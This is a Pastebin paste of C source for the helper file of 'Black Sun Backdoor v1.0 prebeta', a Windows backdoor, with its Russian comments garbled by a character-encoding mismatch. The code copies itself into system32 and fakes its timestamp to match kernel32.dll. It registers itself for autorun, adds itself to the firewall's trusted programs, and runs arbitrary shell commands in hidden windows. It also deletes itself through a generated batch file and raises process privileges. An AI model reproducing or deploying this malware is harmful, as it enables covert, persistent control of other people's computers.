Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * ---------------------------------------------------------------------
- * ____ _ _ _____
- * | _ \| | | | / ____|
- * | |_) | | __ _ ___| | _| (___ _ _ _ __
- * | _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
- * | |_) | | (_| | (__| < ____) | |_| | | | |
- * |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
- * Black Sun Backdoor v1.0 prebeta
- *
- * (x) Cytech 2007
- *
- * ---------------------------------------------------------------------
- * [functions.h]
- * ôóíêöèè äëÿ ðàáîòû ñ ñèñòåìîé (óñòàíîâêà â ñèñòåìó, ñàìîóäàëåíèå
- * è ò.ä)
- * ---------------------------------------------------------------------
- */
- // ----------------------- [ ñîçäàíèå ïîòîêà ] ----------------------- //
- static HANDLE WINAPI StartThread(LPTHREAD_START_ROUTINE lpStartAddress, LPVOID param)
- {
- DWORD lpThreadId;
- return CreateThread(NULL, NULL, lpStartAddress, param, NULL, &lpThreadId);
- }
- // --------------- [ Ïðîïèñûâàíèå ñåáÿ â ðååñòðå è ñàìîóäàëåíèå èç ðååñòðà ] ---------------- //
- static DWORD WINAPI AddSelfToRun(char *mode)
- {
- HKEY hkey, zhkey;
- char str[256], sysbuf[256], myname[256], kernl[256];
- HANDLE hTimeFile;
- FILETIME aFileTime, bFileTime, cFileTime;
- GetModuleFileName(GetModuleHandle(NULL), str, 256);
- GetSystemDirectory(sysbuf, 256);
- lstrcpy(myname, sysbuf);
- lstrcat(myname, "\\");
- lstrcat(myname, EXENAME);
- if(lstrcmp(mode,"addtorun")==0) // ïðîïèñûâàåì ñåáÿ â àâòîçàãðóçêó
- {
- if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, REGKEY, 0, KEY_WRITE,&hkey)==ERROR_SUCCESS)
- {
- // ïîëó÷àåì äàòó ñîçäàíèÿ kernel32.dll
- lstrcpy(kernl, sysbuf); lstrcat(kernl, "//"); lstrcat(kernl, KERNEL32_DLL);
- hTimeFile = CreateFile(kernl, GENERIC_READ, FILE_SHARE_READ, 0,
- OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
- if (hTimeFile != INVALID_HANDLE_VALUE)
- {
- GetFileTime(hTimeFile, &aFileTime, &bFileTime, &cFileTime);
- CloseHandle(hTimeFile);
- }
- CopyFile(str, myname, FALSE);
- hTimeFile = CreateFile(myname, GENERIC_WRITE, FILE_SHARE_WRITE, 0,
- OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
- // óñòàíàâëèâàåì ñåáå äàòó ñîçäàíèÿ kernel32.dll, ÷òîáû ìåíüøå ñâåòèòüñÿ â òîì ñëó÷àå,
- // åñëè ñïëàéñèíã ðàáîòàòü íå áóäåò (íàïðèìåð, çàãðóçêà ÎÑ â Safe Mode).
- if (hTimeFile != INVALID_HANDLE_VALUE)
- {
- SetFileTime(hTimeFile, &aFileTime, &bFileTime, &cFileTime);
- CloseHandle(hTimeFile);
- }
- // ïèøåì ñåáÿ â ðååñòð
- if (RegSetValueEx(hkey, REGNAME, 0, REG_SZ, myname, lstrlen(myname)) == ERROR_SUCCESS);
- {
- RegCloseKey(hkey);
- }
- }
- }
- else if(lstrcmp(mode, "killmyself")==0) // óäàëÿåìñÿ èç àâòîçàãðóçêè
- {
- if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, REGKEY, 0, KEY_WRITE,&zhkey)==ERROR_SUCCESS)
- {
- RegDeleteValue(zhkey, REGNAME);
- RegCloseKey(zhkey);
- }
- }
- return 0;
- }
- // ----------------------- [ ñàìîóäàëåíèå ÷åðåç ñîçäàíèå .bat ] ----------------------- //
- // Ôóíêöèÿ ñàìîóäàëåíèÿ ñ ïîìîùüþ .bat-ôàéëà :). Ëàìåðñòâî :)) Àëüòåðíàòèâíûì ñïîñîáîì
- // ìîæíî þçàòü èíæåêò â äðóãîé ïðîöåññ è îò òóäà ñîçäàòü ïîòîê íà ñàìîóäàëåíèå ïðîñòî ñ
- // ïîìîùüþ DeleteFile :) Ïîòîì ïåðåäåëàþ.
- // Ñóòü æå ýòîãî ìåòîäà çàêëþ÷àåòñÿ â òîì, ÷òî ñîçäàåòñÿ áàòíèê â ïàïêå system32 ñëåäóþùåãî âèäà:
- // ---- [ self.bat ] ----
- // @ECHO off
- // :try
- // DEL C:\WINDOWS\system32\blacksun.exe
- // GOTO try
- // DEL C:\WINDOWS\system32\self.bat
- // ---- [ self.bat ] ----
- // Ïðè çàïóñêå îí ïûòàåòñÿ óäàëèòü ñåáÿ è ñàì áýêäîð äî òåõ ïîð, ïîêà íå ñäåëàåò ýòî.
- // Â ýòî âðåìÿ áýêäîð ïðîñòî çàâåðøàåò ñâîé ïðîöåññ, à áàòíèê óäàëÿåò è ñåáÿ è áýêäîð.
- static DWORD WINAPI DeleteSelfWithBat()
- {
- DWORD dwSz;
- HANDLE hFile;
- char szSelfBatDel[256], szSelfName[256];
- char szTemp[256];
- GetModuleFileName(GetModuleHandle(NULL), szSelfName, sizeof(szSelfName));
- GetSystemDirectory(szSelfBatDel, 256);
- lstrcat(szSelfBatDel, "\\");
- lstrcat(szSelfBatDel, SELFDEL_BAT);
- hFile = CreateFile(szSelfBatDel, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
- if (hFile != INVALID_HANDLE_VALUE)
- {
- ZeroMemory (&szTemp, sizeof(szTemp));
- lstrcpy(szTemp, "@ECHO off\r\n:try\r\nDEL ");
- lstrcat(szTemp, &szSelfName);
- lstrcat(szTemp,"\r\nIF EXIST ");
- lstrcat(szTemp, &szSelfName);
- lstrcat(szTemp, " GOTO try\r\n");
- lstrcat(szTemp, "DEL ");
- lstrcat(szTemp, &szSelfBatDel);
- dwSz = sizeof(szTemp);
- WriteFile(hFile, szTemp, dwSz, &dwSz, NULL);
- CloseHandle(hFile);
- WinExec(szSelfBatDel, SW_HIDE);
- Sleep(100);
- ExitProcess(0);
- }
- return 0;
- }
- static DWORD WINAPI DeleteSelfFirstTime(LPVOID lpParam)
- {
- DeleteSelfWithBat();
- return 0;
- }
- // ----------------------- [ âûïîëíåíèå êîìàíä ñ ïîìîùüþ cmd.exe ] ----------------------- //
- static DWORD WINAPI ExecuteCMD(char * command)
- {
- SECURITY_ATTRIBUTES sec;
- PROCESS_INFORMATION pi;
- STARTUPINFO si;
- HANDLE hOutR, hOutW;
- DWORD BTAvail;
- char * Result = NULL;
- char * cmdline = NULL;
- char cmdpath[256];
- OSVERSIONINFO OSVersionInfo;
- DWORD Read = 0;
- fZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
- fZeroMemory(&sec, sizeof(SECURITY_ATTRIBUTES));
- sec.nLength = sizeof(SECURITY_ATTRIBUTES);
- sec.bInheritHandle = TRUE;
- sec.lpSecurityDescriptor = NULL;
- if (CreatePipe(&hOutR, &hOutW, &sec, 0))
- {
- fZeroMemory(&si, sizeof(STARTUPINFO));
- si.cb = sizeof(STARTUPINFO);
- si.hStdOutput = hOutW;
- si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
- si.wShowWindow = SW_HIDE;
- cmdline = (char *) GlobalAlloc(GMEM_FIXED, (7 + lstrlen(command)));
- lstrcat(lstrcpy(cmdline, " /a /c "), command);
- OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
- GetVersionEx (&OSVersionInfo);
- if (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)
- {
- GetEnvironmentVariable(COMSPEC, cmdpath, 2048);
- }
- if (CreateProcess(cmdpath, cmdline, &sec, &sec, TRUE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi))
- {
- WaitForSingleObject(pi.hProcess, INFINITE);
- CloseHandle(pi.hThread);
- CloseHandle(pi.hProcess);
- PeekNamedPipe (hOutR, NULL, 0, NULL, &BTAvail, NULL);
- if (BTAvail > 0)
- {
- Result = (char *) GlobalAlloc(GMEM_FIXED, BTAvail + 1);
- ReadFile(hOutR, Result, BTAvail, &Read, NULL);
- Result[BTAvail] = '\0';
- OemToChar(Result, Result);
- if(lstrlen(Result) > 0){ return Result; }
- else { return MSG_CMDEXECUTED; }
- }
- }
- }
- return 0;
- }
- // ----------------------- [ ñïðÿòàòü/ïîêàçàòü îêíî ] ----------------------- //
- static DWORD WINAPI SetWindowStatus(HWND hWnd, char *mode)
- {
- if (lstrcmp(mode, "show")==0)
- {
- ShowWindow(hWnd, SW_SHOW);
- }
- else if (lstrcmp(mode, "hide")==0)
- {
- ShowWindow(hWnd, SW_HIDE);
- }
- return 0;
- }
- // ------------------ [ äîáàâëíèå ñàìîãî ñåáÿ â netsh êàê äîâåðåííîå ïðèëîæåíèå ] ------------------ //
- // Íåäàâíî âîò ïîïàëñÿ ìíå òðîé â ðóêè, ïðîäèçàñìèâ åãî, ÿ óâèäåë òàì ýòó ñòàðóþ,
- // íî ïîëåçíóþ ôè÷ó. Ðåøèë äîáàâèòü è ñþäà. Ñàìîäîáàâëåíèå â äîâåðåííûå ïðèëîæåíèÿ ôàéðâîëà
- // NetSH (ñòàíäàðòíàÿ âèíäîâñêèé ôàéð). Ïðîñòî âûïîëíÿåòñÿ êîìàíäà:
- // netsh firewall set allowedprogram C:\WINDOWS\system32\blacksun.exe enable
- static DWORD WINAPI NetSHFirewallReg()
- {
- char fireexec[256], my_path[256];
- GetModuleFileName(0, my_path, 256);
- lstrcpy(fireexec, NETSH_ADD_1);
- lstrcat(fireexec, my_path);
- lstrcat(fireexec, NETSH_ADD_2);
- WinExec(fireexec, SW_HIDE);
- return 0;
- }
- // ------------------ [ ïîëó÷åíèå êàêèõ-ëèáî ïðèâåëåãèé ] ------------------ //
- // Ïîëó÷åíèå ïðèâåëåãèé ïðîöåññà, íàïðèìåð, ïðèâåëåãèé îòëàä÷èêà èëè shutdown-ïðèâåëåãèé
- static BOOL SetPrivilege(char* SeNamePriv, BOOL EnableTF)
- {
- HANDLE hToken;
- LUID SeValue;
- TOKEN_PRIVILEGES tp;
- if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken))
- {
- return FALSE;
- }
- if (!LookupPrivilegeValue(NULL, SeNamePriv, &SeValue))
- {
- CloseHandle(hToken);
- return FALSE;
- }
- tp.PrivilegeCount = 1;
- tp.Privileges[0].Luid = SeValue;
- tp.Privileges[0].Attributes = EnableTF ? SE_PRIVILEGE_ENABLED : 0;
- AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
- CloseHandle(hToken);
- return TRUE;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
